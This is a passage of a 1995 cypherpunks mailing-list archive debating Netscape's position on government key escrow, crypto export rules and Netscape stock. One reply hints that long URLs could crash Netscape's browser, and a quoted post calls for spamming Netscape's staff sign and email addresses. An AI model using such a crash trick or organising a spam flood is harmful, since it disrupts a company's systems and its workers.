we are merely pointing out to whoever will listen that a spineless money decision has been made, is the center of hyprocracy. It sickens me. > In general, people prefers positive presentations to complains > or problems. Have a look at TV ads. How many of them say "Don't use > that stuff, it's shit" instead of "Use my stuff, it's better". As does this psycho-babble trash. > That's what I advocate: a positive course of action, offering > a better alternative. Not just a storm of complains or "bad karma". So when pinto's explode, I might as well just advertize hondas as a 'better value' and not mention the rather glaring fault in the competing product? I might add, few cypherpunks (to their great credit) sell their software. We are interested in the software being the strongest, and best quality. Freeware has that effect, it clairifies the issue. No longer is hype or advertizing an issue. It is merely quality, and peer review, elements which Netscape has completely missed the target (and the barn) on from the beginning. > >What more are you expecting? Have you been reading what people are actually > >discussing doing and actually already doing? > > > Yes, I've read all along. As I hope will be more clear now. And > I have found lots of people saying "I won't support Netscape", "I will > say no", "I will deny access to Netscape", "I'll add a complain to my > page", "Jim should retract", "Netscape should go back", "Netscape better > changes its money-making policy and becomes a political activist", > "This or that guy must quit job"... > > What I was expecting is people to be more realistic, not to forget > that the main goal of a company is to make money instead of defending public > freedom (which indeed is bad for business), and start promoting better (or > not) alternatives. You mean to realize that Netscape could care less about the 'educated' consumer who is displeased with the decision, and instead is following that large nose which sniffs the waifting scent of green? Look, I am as much for free market as anyone else. That's fine. Don't, however, tell anyone not to complain because this or that company is only in it for the money. Some people vote with their feet. I sold the lot of my netscape shares. I did just fine, and I will sleep better at night. SOME cypherpunks do buy stock. Some of us put a great deal of money into the market in fact. Some of us are interested in promoting companies that further our LONG term interests as well as short term interests. If you would happen to look at the long term, you might discover that there is more money in it for Netscape, and everyone else, if strong crypto is not restricted. Unfortuantely, like most Joe Randoms, and most Joe Random Inc.'s, long term for you is when the restricted sell of your stock options expire. Either support GAK or do not. Don't give us horseshit about how you think we are being too hard on Netscape because we are educated consumers, and because we realize that GAK crypto is not the best product it could be. It is as much our right to gripe and moan about the spineless decision as it is for you to make it. To tell us to ignore it is hypocritical in the extreme. If your product is so superior, why the hell should you care about a few cypherpunks moaning about this or that? Aren't we members of the free market as well? Who are you to tell us that our decision to promote or to denounce netscape is based on the wrong criteria? The entire point of the free market is to hear and support those concerns in the proportionate levels and with the respective influences that they wield. Take your emotional censorship elsewhere. And while your at it, try making a superior product to please us, rather than some high-school textbook psycho-babble about saying only nice things to the other children in the sandbox. > And, to finish, note that I have also seen some very good answers, > on which I don't coment since I agree and have little to add to. > > >--Tim May > > > jr --- "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From jsw at netscape.com Sat Dec 2 16:29:09 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Sat, 2 Dec 95 16:29:09 PST Subject: GAK Flap Happening at a Good Time--Journalists Read! In-Reply-To: Message-ID: <30C0EE0D.48A9@netscape.com> Black Unicorn wrote: > > On Sat, 2 Dec 1995, Jeff Weinstein wrote: > > > Black Unicorn wrote: > > > > > > On Fri, 1 Dec 1995, Jeff Weinstein wrote: > > > > > See my recent message to this list. We will be taking an anti-GAK > > > > position. > > > > > > So you will refuse to implement GAK in future version of netscape then? > > > Or you will merely do lipservice to the GAK policies at the conference? > > > > > > I think the distinction is quite key. > > > > If the law requires GAK, then I believe that we will implement it rather > > than just disable encryption. We are taking a position against GAK and > > will continue to lobby against it. We are planning to continue to do both > > US and Export versions, so I don't think that the government's ploy of > > trying to lure companies into weakening their domestic versions will work. > > AT&T seems to have been suitably 'incentivized' > The receipt of government funding (in whatever guise) might be just as > powerful in this case. > > To the outsider, it looks as if Netscape 'owes' the government. We do owe the government. They have paid us for Servers and Clients that support Fortezza. That is what we owe them. The money that the NSA gave us for Fortezza is not very significant compared to what we are getting from commercial sources. > > We released a 128-bit version of our product almost a year ago, at a > > time when many companies were providing only weak crypto in their domestic > > products so that they didn't have to trouble themselves with two versions. > > And this is impressive. Stamina, however, is much more difficult. > > > We are actively lobbying in washington to get clarification of the > > current regulations so that we can provide the US version via an "export > > controlled" FTP or HTTP download. > > With which firm? Or have you made it an in-house effort? We have recently hired a government liason person to manage our policy discussions with the government. He is one of the people that will be talking to congressional and white house representatives next week. I don't know if we have made use of any outside lobbying firms. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From jsw at netscape.com Sat Dec 2 16:36:08 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Sat, 2 Dec 95 16:36:08 PST Subject: GAK Flap Happening at a Good Time--Journalists Read! In-Reply-To: <199512021936.LAA09776@infinity.c2.org> Message-ID: <30C0EF90.132D@netscape.com> sameer wrote: > > > > > With which firm? Or have you made it an in-house effort? > > > > There was no Netscape (or RSADSI, for that matter [an RSADSI > employee showed up, but it was on his own time]) representative at the > recent Bernstein hearing in SF. I think that shows how much they > really care. How would having an official representative from Netscape in the audience have influenced the outcome of the proceedings? I would have liked to attend, but was in the process of trying to get a beta release out at the time. Do you honestly believe that the only people who want Bernstein to win are those who were present in the court room that day? Not even Dan himself was there. Does that mean that he doesn't care about the outcome of the case? --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From unicorn at polaris.mindport.net Sat Dec 2 00:48:15 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Sat, 2 Dec 1995 16:48:15 +0800 Subject: Netscape gives in to key escrow In-Reply-To: Message-ID: On Fri, 1 Dec 1995, Brian Davis wrote: > On Fri, 1 Dec 1995, Jonathan Zamick wrote: > > > Hmm. The key point is that almost no general users will have a clue what > > actual security is, and what GAK is. They _might_ understand the risks of > > having an explosive in their vehicle (but can just as easily argue it wasn't > > > properly designed if it went off improperly.) Regardless of what they'd know > > about their vehicle, they can easily claim to had the risks associated with > > GAK improperly represented, Netscape misleading them with deceptive claims > > of security given this potential hole etc. > > And thus we return to my original point, which is that it will depend on > what is said/disclosed. If every copy of GAKscape had a banner, bigger > than the Netscape "N" which said, "The government can read every message > you send using this software no matter what you do" then I think > consumers will be hard pressed to say they weren't warned. One might want to consider the effect of _Smith v. Maryland_, 442 U.S. 735 (1979) - As described in _California v. Greenwood_, 486 U.S. 35 (1988). "We held in Smith v. Maryland, for example, that the police did not violate the Fourth Amendment by causing a pen register to be installed at the telephone company's offices to record the telephone numbers dialed by the suspect (without a warrant). An individual has no legitimate expectation of privacy in the numbers dialed on his telephone, we reasoned, because he voluntarily conveys those numbers to the telephone company when he uses the telephone. Again, we observed that "a person has no legitimate expectation of privacy in information he voluntarily turns over to third parties. or to rephrase in the likely implementation: An individual has no legitimate expectation of privacy in the encryption numbers in his GAK browser, we reasoned, because he voluntarily conveyed those numbers to the government when he purchased the software. > > > > I'm not saying whether or not this is the case, but we are very much in a > > legal period where individuals are in fact expected not to need common sense, > > and corporations are responsible for cleaning up after consumer stupidity. I would say the above indicates that infact a lot more than common sense is needed to try and assure privacy. It would seem that when it comes to privacy, you have to be a phone techie or in this case, a crypto techie, to expect to be protected. > > > > It is certainly true that given the general state of education regarding > > crypto, the average consumer can easily say that regardless of warnings about > > GAK, that they weren't properly informed of the risk. With all the hype > > around security, Netscape and encryption people will be under the > > impression regardless > > of one little disclaimer tag, that their information is safe. Neither > > government nor corporations will disabuse them of this belief. The case > > would be strong against them as a consumer. In fact it would seem that there is almost a burden imposed on the user to determine who and what gets the information of the software should he or she want to be protected by the constitution. > I disagree. Almost nobody read the fine print on the back of a note you > sign when you buy a car or otherwise take out a loan, but the provisions > are generally enforceable ... Ignorance is not necessarily an excuse. Actually, I was under the impression that adherance contracts like that (the most oft touted example is the ski lift ticket with four paragraphs on the back) are often tossed out when it has to do with liability on that order. The reason loan agreements are not often thrown out is because courts find an increased expectation that the consumer would be paying attention to the back of loan documents than the back of a ski lift ticket. I think it will be unlikely that warnings on the box of a given piece of software will suffice. Large banners in the program itself may meet the threshold. If there is enough interest, I will research the threshold issue. > > Jonathan > > > > ------------------------------------------------------------------------ > > ..Jonathan Zamick Consensus Development Corporation.. > > Not a lawyer on the Net, although I play one in real life. > ********************************************************** > Flame away! I get treated worse in person every day!! --- "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From unicorn at polaris.mindport.net Sat Dec 2 00:48:32 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Sat, 2 Dec 1995 16:48:32 +0800 Subject: Netscape gives in to key escrow In-Reply-To: <199512011629.KAA28071@galil.austnsc.tandem.com> Message-ID: On Fri, 1 Dec 1995, Sten Drescher wrote: > Matt Miszewski said: > > MM> On Thu, 30 Nov 1995, sameer wrote: > > s> Jeff: If Netscape comes out in favor of GAK, will you leave? (Wait > s> until February, at least, of course..) You don't have to answer that > s> to me, or the list, just think about it, and answer it for yourself. > s> Do you think "anyone else" there would leave, as you say below that > s> they don't want to go down history, etc... > > MM> While this would go over well in the press if handled right please > MM> let everyone remember that Jeff is a real person with bills to pay > MM> and food to put on at least his own table. > > I believe that was the point: How many people at Netscape would > put principled opposition to GAK ahead of expediency? My guess? Not > enough. > And more importantly, what exactly is the GAK issue worth to netscape types? Don't spout that trash about not being able to put food on the table. Salary cut, maybe, temporary job search, maybe, but poverty? I hardly think so. So, for a 15% reduction in salary and 30 days of job search, is it worth it? Answer for yourself. That's where you really stand. > -- > #include /* Sten Drescher */ > To get my PGP public key, send me email with your public key and > Subject: PGP key exchange > Key fingerprint = 90 5F 1D FD A6 7C 84 5E A9 D3 90 16 B2 44 C4 F3 > --- "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From rsalz at osf.org Sat Dec 2 01:11:15 1995 From: rsalz at osf.org (Rich Salz) Date: Sat, 2 Dec 1995 17:11:15 +0800 Subject: GAK, Netscape, CyberDog, and you. Message-ID: <9512011745.AA21052@sulphur.osf.org> Bob, Please stop this habit of cross-posting to every mailing list; 999 times out of a thousand the resultant discussion helps neither list. And my god, five lists this time, at least some of which have over a thousand readers? NB: Followups redirected. /r$ From jsw at netscape.com Sat Dec 2 01:50:08 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Sat, 2 Dec 1995 17:50:08 +0800 Subject: GAK Flap Happening at a Good Time--Journalists Read! In-Reply-To: <199512011556.HAA08776@blob.best.net> Message-ID: <30C006E4.D39@netscape.com> James A. Donald wrote: > > At 03:01 AM 12/1/95 -0800, Timothy C. May wrote: > >I hope the media types reading now will attend the December 5th (I > >think...details should be available) gathering on "key escrow" in > >Washington. D.C. This should be a fiery meeting, especially if the Netscape > >reps (I assume someone from Netscape will be attending, given their central > >role in the all-important Web world) either denounce GAK or support GAK. > > I will prepare the netscape dehanced dirty pictures web page, > but not advertize the URL until shortly after December 5th. > > I hope to hear a suitable "clarification" before then. See my recent message to this list. We will be taking an anti-GAK position. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From fc at all.net Sat Dec 2 01:53:41 1995 From: fc at all.net (Dr. Frederick B. Cohen) Date: Sat, 2 Dec 1995 17:53:41 +0800 Subject: John Gage's comments at Computer Security Day in Cleveland Message-ID: <9512020042.AA27998@all.net> John Gave gave an interesting pitch for Java at the CSSI Computer Security Day sessions in Cl;evelan yesterday (November 30). Among his comments were: Java is not secure - it is "safe" He (John Gage) regularly downloads binary executables from the Internet and runs them on his workstation at Sun - (connected to the internal Sun network). Sun has terrible physical security - unknown people roam the halls at night all by themselves. In 2 years, you will be able to buy a computer that does more than a Sparc now does, in a portable package the size of a cell phone, with more than 30 million bits per second of mobile bandwidth direct to the Internet, for less than $30. -> See: Info-Sec Heaven at URL http://all.net/ Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From jamesd at echeque.com Sat Dec 2 03:23:16 1995 From: jamesd at echeque.com (James A. Donald) Date: Sat, 2 Dec 1995 19:23:16 +0800 Subject: Getting a copy of the Jim Clark speech Message-ID: <199512010807.AAA12540@blob.best.net> At 12:38 AM 12/1/95 +0600, Ed Carp wrote: >The only problem with this approach is that this will bite other >browsers that have started supporting the so-called "Netscape >extensions". More than one person has coded the Netscape stuff into >their pages because it gives the author more flexibility than the >standard 1.0/2.0 standards. And there aren't many browsers out there >yet that support 3.0. http://www.netmanage.com/ have a free browser that supposedly supports 3.0 -- I have not tested it yet, though I downloaded it a short while ago. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From graeme at chem2.chem.swin.edu.au Sat Dec 2 03:23:36 1995 From: graeme at chem2.chem.swin.edu.au (Graeme Cross) Date: Sat, 2 Dec 1995 19:23:36 +0800 Subject: Getting a copy of the Jim Clark speech In-Reply-To: <199512010549.VAA27874@blob.best.net> Message-ID: On Wed, 29 Nov 1995, James A. Donald wrote: > At 09:43 PM 11/30/95 -0600, Frank Stuart wrote: > > I'm working on an "obnoxify" program to convert > > normal html documents into documents that look > > normal to non-netscape browsers, but are too painful to > > read with netscape (, , etc.). > > I think tomorrow evening would be a good time to decide > > whether or not to distribute it. > > Is there any way one could set up a dirty pictures web > page in such a fashion that it would be difficult, painful, > and impractical to get at the pictures through that page > with a netscape browser? This is extremely simple to implement. Make the pages parsed HTML, check the HTTP_USER_AGENT environment variable, if it contains Mozilla, return a message that reads something along the lines of 'hands off my keys', otherwise return useful data (GIFs, whatever...) Also, remember that Netscape Navigator crashes (or at least version 1.x did) on URLs that were very long, and also on pages that contained a long string of numbers... Cheers Graeme ------------------------------------------------------------------------ Graeme Cross Phone: (61 +3) 9214 8185 E-mail: graeme at chem2.chem.swin.edu.au PGP key: http://www.chem.swin.edu.au/~graeme/key.html From wiltship at iccu6.ipswich.gil.com.au Sat Dec 2 04:44:33 1995 From: wiltship at iccu6.ipswich.gil.com.au (PeterWiltshire) Date: Sat, 2 Dec 1995 20:44:33 +0800 Subject: NSC Announce Message-ID: <199512021234.XAA25640@iccu6.ipswich.gil.com.au> Thought this might be of interest.... From: ipSecure Subject: iPower home page/CryptoSampler announcement Date: Fri, 01 Dec 95 15:53:55 PDT For Immediate Release Contact: National Semiconductor Lori Sinton (408) 721-2448 lori at ipower.nsc.com http://www.ipsecure.com CryptoSampler, from National Semiconductor, Demonstrates Ease of Building Secure Electronic Commerce and Communications Applications Company's iPower(tm) Business Unit Launches Free CryptoSolver to Inaugurate New Web Site SANTA CLARA, Calif., November 27, 1995 --- National Semiconductor Corporation today announced the availability of its CryptoSampler package for applications developers interested in gaining a "hands on" understanding of how cryptography solves modern business problems. Developed by National's iPower Business Unit, the program consists of three demonstration applications and the PersonaCard(tm) 100, a hardware token for personal, portable data security. The package contains both the demonstration applications including "build-it- yourself" tools to integrate security easily into electronic commerce and communications applications. Priced at $129, the CryptoSampler package is available to the first 1,000 U. S. respondents and can be ordered directly from National's iPower Business Unit. In a related move, the company's iPower Business Unit launched its own web site along with CryptoSolver, an interactive game that invites participants to solve encrypted messages based on the concepts of substitution ciphers and the alphabetic frequency table. CryptoSolver, a technology-teaser game rates players' deciphering skills and can be downloaded from iPower's new web site free. "As networks become the lifeblood of corporations and the principal means of commerce, securing electronic transactions and proprietary information over public and private networks is absolutely critical," said Tom Rowley, marketing director for National's iPower Business Unit. "Through this program, we hope to help broaden individual's understanding of how modern security technology can solve real problems on the Internet and in Electronic Commerce business applications," Rowley explained. CryptoSampler Package - Token Plus Three Applications in One ------------------------------------------------------------ The CryptoSampler package consists of a PersonaCard 100 data security token, a floppy disk containing all three demonstration applications, a cryptography primer written by recognized cryptography expert Bruce Schneier, and a questionnaire. Customers who choose to complete and return the questionnaire, will receive a free copy, while supplies last, of Bruce Schneier's newly-released book, Applied Cryptography, second edition. o PersonaScreen(tm) System Lockout Utility is a screen locker that prevents unauthorized entry into a personal computer by locking the keyboard and mouse. The PersonaCard Token, implemented in the PC Card (formerly PCMCIA) Type II format, locks and unlocks the desktop computer. o PersonaSecure(tm) Word Utility enables users to sign, seal (encrypt, decrypt), and verify documents as well as e-mail messages from within Microsoft Word 6.0 for Windows. Installed automatically, PersonaSecure displays a toolbar that corresponds to the functions of National's PersonaCard data security token. The hardware token incorporates RSA's industry-standard digital signature and encryption formats which are now "token aware." In addition to protecting and validating Microsoft Word documents, users can encrypt and decrypt e-mail messages with others who have installed the PersonaSecure Word Utility. o PersonaDLL Library for Visual BASIC 3.0 is a Dynamic Link Library (DLL) of routines that enables developers to quickly and easily develop their own applications incorporating high-level data security features. PersonaDLL includes a Visual BASIC application, Visual BASIC source code, and access to all of the features of the PersonaCard 100 token including digital signatures, RSA key generation, encryption, and verification. System requirements to run the CryptoSampler package are: Microsoft Windows 3.X, Windows for Workgroups 3.X, and a PC Card slot (version 2.1 or later). Microsoft Word 6.0 is required for the PersonaSecure Word Utility. Pricing and Availability ------------------------ The CryptoSampler package is available with or without a PC Card Reader. For those who plan to run CryptoSampler applications on a desktop or portable personal computer already equipped with a PC Card slot, the basic package is offered at a special price of $129 (including handling and shipping). A CryptoSampler package with PC Card reader is available for $199. The total retail value of the basic package and configuration with card reader is $300 and $500, respectively. To order the CryptoSampler package in either configuration, call 1-800-272-9959 Ext# 631 between the hours of 7 AM and 7 PM Central Standard Time. To play CryptoSolver and for more information about the CryptoSampler program, see the iPower web site at http://www.ipsecure.com . iPower Security Solutions ------------------------- Introduced a year ago, iPower technology provides the highest-level of commercially available security in a personal, portable hardware token. iPower solutions are already being incorporated by OEMs, ISVs, and VARs into a variety of applications and hardware platforms including e-mail and messaging, electronic commerce, network security, and secure access to on-line services including the Internet. National Semiconductor Corporation provides technologies for moving and shaping information. The company focuses on four key areas - communications, consumer, industrial, and personal systems. National Semiconductor is headquartered in Santa Clara, California, and has 22,300 employees worldwide. -30- Note to Editors: To receive a CryptoSampler package for review, call or e-mail Lori Sinton, 408 721-2448 or sampler at ipower.nsc.com iPower and PersonaCard are trademarks of National Semiconductor Corporation. All other trademarks are held by their respective companies Flight to Quality Wiltshire Productions Pty Ltd Brisbane, Queensland, Australia Intl Voice 61 7 3376 3535 Intl Fax 61 7 3279 4027 Email wiltship at gil.com.au PGP Key ID 3E584C7D PGP Fingerprint 01 03 FB F4 BE F8 2B F3 5D 84 6B 69 37 80 FE 10 From fc at all.net Sat Dec 2 05:26:48 1995 From: fc at all.net (Dr. Frederick B. Cohen) Date: Sat, 2 Dec 1995 21:26:48 +0800 Subject: Netscape, Mosaic, and other goodies. In-Reply-To: Message-ID: <9512021309.AA26669@all.net> ... > It's funny how one day we are raving about how great Netscape is, and the > next day we hate them. If we aren't pleased with a particular piece of > software, instead of argueing about it we should just go and make one > that we are pleased with. Using the many libraries available such as MPEG, > GIF, JPEG for example and releasing it under the GNU agreement is the way > to go. Or perhaps we should just back the original browser, NCSA Mosaic. > With some improvements it could once again be the best browser on the net. Isn't it strange that the same people on this list who have been giving abuse to those of us who have been warning you about Netscape - are now coming to see that we were right all along? My point is NOT what you may think it is (i.e., that we were right and you were wrong). My point is that people on this list are a little bit too quick to jump to conclusions. Some of you are now marching off in opposition to Netscape based on a rumor about what someone from Netscape said and a report of a grant by the NSA. This sort of knee jerk reaction is often inappropriate. As to the idea of going with NCSA's mosaic, I'm all for it. In fact, that's the browser I've been using all along - mostly because it comes in source form so I can modify it for my less-popular operating environment, because there's no fee for its use, and because it's not a hyped up commercial venture with a stock having a price to earnings ratio of 7,000. -> See: Info-Sec Heaven at URL http://all.net/ Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From fc at all.net Sat Dec 2 05:30:58 1995 From: fc at all.net (Dr. Frederick B. Cohen) Date: Sat, 2 Dec 1995 21:30:58 +0800 Subject: Info on Netscape's key escrow position In-Reply-To: <199512020701.XAA01919@ammodump.mcom.com> Message-ID: <9512021318.AA27932@all.net> > I had lunch with Jim Clark today, and explained the furor that was > currently going on in cypherpunks and elsewhere. After lunch he sent > me the e-mail that I've attached below to pass along. I think the gist > of it is that if governments require key escrow, we will have to do it > in order to sell our products with encryption into those countries. The point Netscape seems to miss is that by refusing to go with weak crypto and having the best product on the market, Netscape may be able to force these governments into a position of accepting it. Suppose Netscape took the position that it was 512 bit RSA, and that it was for sale to anyone who wanted to buy it? The result would either be a billion dollars of market impact and a collapse of the high-tech stock bubble we are now building, or the government backing down. If the US government backed down, and Netscape became the best product around and maintained that lead for a long time, other countries would either have to allow Netscape in, or suffer the consequences of falling behind in the IT curve. The right move for Netscape is to improve crypto-security, to refuse to give in to government, and to publicly vilify the people in government who stand in their way. When billions of dollars are at stake and the blame is placed squarely on the shoulders of a politician trying to claim economic improvements based on their policies, the politician is likely to yield. -> See: Info-Sec Heaven at URL http://all.net/ Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From anonymous-remailer at shell.portal.com Sat Dec 2 05:41:19 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Sat, 2 Dec 1995 21:41:19 +0800 Subject: Talking to Jim Message-ID: <199512021324.FAA15861@jobe.shell.portal.com> On Sat, 2 Dec 1995, PeterWiltshire wrote: > Gidday all > > I emailed Jim Clark day before yesterday about his comments re key escrow. Uhhm, what is his email address?? I'd love to ask him one or two questions, not just about key escrow, but about Netscape's future prospects and its current stock valuation. (Netscape now has a market capitalization larger than Apple Computer.) > He responded. As it's not good form to post private email, might I suggest > that one of the 'elders' here put to Jim a list of questions on the proviso > that his answers can be posted to the list. You never know, a lot of > speculation might be confirmed or denied. I've got some questions ... Mathew Ingram, reported in the Investment Reporter that Jim has stock holdings currently worth more than $1 Billion in Netscape, and yet Jim was quoted as saying at a recent technology conference "you could argue there's something of an Internet bubble developing." The article also quoted him as saying that if Netscape made a profit in the next year or two it would only be "because we miscalculated." Miscalculated?? I'll say. If he thinks that GAK will go down with great support, when they want to split their stock, then they're really not quite aware of the mind of the organization that they'll be up against. I wonder what people will have to say about Netscape, then. Right now, brokerage firm Hambrecht & Quist is estimating that in five years the Internet will be a $23 Billion market -- equal to the size of the _entire_ software industry today. And a money manager at Franklin Resources Inc. said, "some people are suggesting the big tech company in the next century could be Netscape." Personally, I don't think so. But then who am I?? Goldman Sachs just put Netscape on its "recommended" list. And some analyst called Michael Parekh was quoted as saying that Netscape could hit $200 in the next two years. That it was going to be the Microsoft of the Internet -- dominating the software side of the World Wide Web. I wonder if Parekh's valuation is a pre or post stock split evaluation. Shoot, if Parekh is talking about $200 post-split ... then Netscape could well become a really big league play in this game far sooner than most people think. I'd love to hear how this fits with Jim's words of a "bubble". The market seems to "think" that it's a better present judge of what Netscape has than he does. It's almost as though the "market" has developed a "mind" of its own. It's own particular neural network. It doesn't seem like the market is paying attention to any of Jim's warnings or words. His "opinion" -- like all corporate officers opinions are strongly discounted and very lightly weighted. It's almost as though there is automated software at work. Some people might think about going short against the box on this one. Although the article talked about a short "squeeze" which would generally mean that this stock is going to go nowhere but up as the short sellers try to cover, personally, I might start to take some money off the table and not add anything to my position. But all this depends on the depth of someone's pockets, I guess. And on some serious trading analysis. Then again, there is that old adage about never fighting the tape. It's compared frequently to whizzing into the wind, I think. Probabilities and such. (Disclaimer: This is not intended as and should not be considerred as investment advice ... or for that matter as whizzing advice, either.) I'd love to hear Jim talk some more about this. For me, all of this Netscape stuff is getting way too surreal. It seems really strange. Some people are arguing that things are getting out of hand, and yet it seems like this one is completely out of Jim's control. No one is listening to ANYTHING from Netscape at all. The market is simply listening to its own internal dialogue. And that certainly is a surprise to this writer. It's a surprise to me, and it's probably a surprise to Netscape. Finance 501 is more complex than Finance 101. Maybe they should read up about the privatization of BP and the involvement of the KIO. Or learn a bit about Li Ka-Shing, or something which adds to their knowledge base. That might give some idea about what is actually going on here. (Not that the Kuwaiti Investment Office or Li-Ka Shing has an interest in this one.) Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. From jya at pipeline.com Sat Dec 2 06:32:19 1995 From: jya at pipeline.com (John Young) Date: Sat, 2 Dec 1995 22:32:19 +0800 Subject: SHU_tup Message-ID: <199512021424.JAA16245@pipe4.nyc.pipeline.com> 12-2-95. NYPiper: "Accord Reached For Limiting Smut on Internet." Page One lead. Bowing to a seemingly unstoppable push in Congress to keep sexual material off the Internet, a coalition of commercial on-line services and some civil liberties groups agreed today to accept a number of restrictions they had opposed a few months ago. "Terrorism Bill Plan May Break Deadlock." Tiny article. In a bid to salvage a stalled antiterrorism bill, the chairman of the House Judiciary Committee has agreed to the demands of conservative Republicans to remove proposals expanding the Government's wiretapping authority. SHU_tup (10 kb) From jsw at netscape.com Sat Dec 2 06:34:03 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Sat, 2 Dec 1995 22:34:03 +0800 Subject: GAK Flap Happening at a Good Time--Journalists Read! In-Reply-To: <30C006E4.D39@netscape.com> Message-ID: <30C016E6.6264@netscape.com> Black Unicorn wrote: > > On Fri, 1 Dec 1995, Jeff Weinstein wrote: > > > James A. Donald wrote: > > > > > > I will prepare the netscape dehanced dirty pictures web page, > > > but not advertize the URL until shortly after December 5th. > > > > > > I hope to hear a suitable "clarification" before then. > > > > See my recent message to this list. We will be taking an anti-GAK > > position. > > So you will refuse to implement GAK in future version of netscape then? > Or you will merely do lipservice to the GAK policies at the conference? > > I think the distinction is quite key. If the law requires GAK, then I believe that we will implement it rather than just disable encryption. We are taking a position against GAK and will continue to lobby against it. We are planning to continue to do both US and Export versions, so I don't think that the government's ploy of trying to lure companies into weakening their domestic versions will work. We released a 128-bit version of our product almost a year ago, at a time when many companies were providing only weak crypto in their domestic products so that they didn't have to trouble themselves with two versions. We are actively lobbying in washington to get clarification of the current regulations so that we can provide the US version via an "export controlled" FTP or HTTP download. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From perry at piermont.com Sat Dec 2 06:46:27 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sat, 2 Dec 1995 22:46:27 +0800 Subject: C'MON N' GIVE 'EM HELL, NET-NERDS!!!! In-Reply-To: Message-ID: <199512021438.JAA10983@jekyll.piermont.com> Okay, now that Linda Thompson seems to have trouble with Netscape, I have to wonder if we are doing everything here right. I mean, she's a nutcase, and although not everything nutcases say is insane, we have to ask ourselves what is going on. Perhaps we should wait a few days and ask Jim Clark for an official position before doing anything to try to discourage the use of Netscape browsers. .pm Linda Thompson, American Justice Federation writes: > They asked for it: > > "To secure Net communications, the government will need to > have access to private data exchanges using what is known as a key escrow > security system," -Netscape Communications chairman Jim Clark, arguing for > a security system called key escrow that would require you to give the > government access to your private messages. > > Source: STAMPER'S NEWS NUGGETS > > (1) SPAM THE SIGN > Netscape has a webpage at www.netscape.com. There is a "toys" area and any > message you leave in that area goes to an ELECTRONIC MARQUEE SIGN at > Netscape that all the employees can see. SPAM THAT SIGN. > > (2) SPAM NETSCAPE > > Here's where the EMAIL BLITZ should go (extra points for creativity): > > info at netscape.com > General information > > admgr at netscape.com > Netscape site advertising sales > > x_cbug at netscape.com > Bug reports from X Window users > > win_cbug at netscape.com > Bug reports from Windows users > > mac_cbug at netscape.com > Bug reports from Macintosh users > > hr at netscape.com > Netscape Human Resources department > > training at netscape.com > Netscape Training programs information > > admgr at netscape.com > Netscape site advertising sales and Sponsor program information > > proprietor at netscape.com > Netscape electronic store feedback > > editor at netscape.com > Feedback about Netscape's Net site > > ssl-talk-request at netscape.com > E-mail list for Secure Sockets Layer protocol discussion > > standards at netscape.com > Questions about Netscape's open-standards activities > > nswinapi-talk-request at netscape.com > E-mail list for users of the Windows Netscape Server API > CORPORATE HEADQUARTERS > > ------------------------------------------------------------- > > NETSCAPE COMMUNICATIONS CORPORATION > 501 E. Middlefield Rd. > Mountain View, CA 94043 > 415/528-2555 Product and sales information (7:00 a.m. to 5:00 p.m. PST) > 415/254-1900 Executive offices > 415/528-4124 Fax > http://www.netscape.com > > ATLANTA > Netscape Communications Corporation > 1850 Parkway Pl. > Suite 420 > Marietta, GA 30067 > > CHICAGO > Netscape Communications Corporation > 2159 N. Seminary > Chicago, IL 60614 > > DALLAS > Netscape Communications Corporation > 17304 North Preston Road > Suite 800 > Dallas, Texas 75252 > > NEW YORK > Netscape Communications Corporation > 599 Lexington Ave. > Suite 2300 > New York, NY 10022 > > NORTHWEST > Netscape Communications Corporation > 501 Middlefield Rd. > Mountain View, CA 94043 > > SOUTHWEST > Netscape Communications Corporation > 111 N. Sepulveda Blvd. > Manhattan Beach, CA 90266 > > WASHINGTON, D.C. > Netscape Communications Corporation > 6701 Democracy Blvd. > Suite 300 > Bethesda, MD 20817 > > THANKS AND A HAT TIP TO HELEN AT E.PLURIBUS FOR GETTING ALL THE > ADDRESSES!!!!!!!! > Kind regards, > > *********************** V ************************* > DEATH TO THE NEW WORLD ORDER > **************************************************** > > Linda Thompson > American Justice Federation > Home of AEN News & news videos, "Waco, the Big Lie," "America Under Siege" > 3850 S. Emerson Ave. > Indianapolis, IN 46203 > Telephone: (317) 780-5200 > Fax: (317) 780-5209 > Internet: lindat at iquest.net > > ************************************************** > Remember Waco. The Murderers are still free. > *************************************************** > > The Army is going to courtmartial Spc. Michael New > for not wearing a U.N. uniform, but the Army won't > courtmartial the members of the 160th and 158th > Special Operations, 82nd Airborne, Ft. Hood Cav > Members, and 10thMountain Division members > who helped MURDER CHILDREN at Waco. > > What's wrong with this picture? > > > > > > > > From nobody at REPLAY.COM Sat Dec 2 07:11:29 1995 From: nobody at 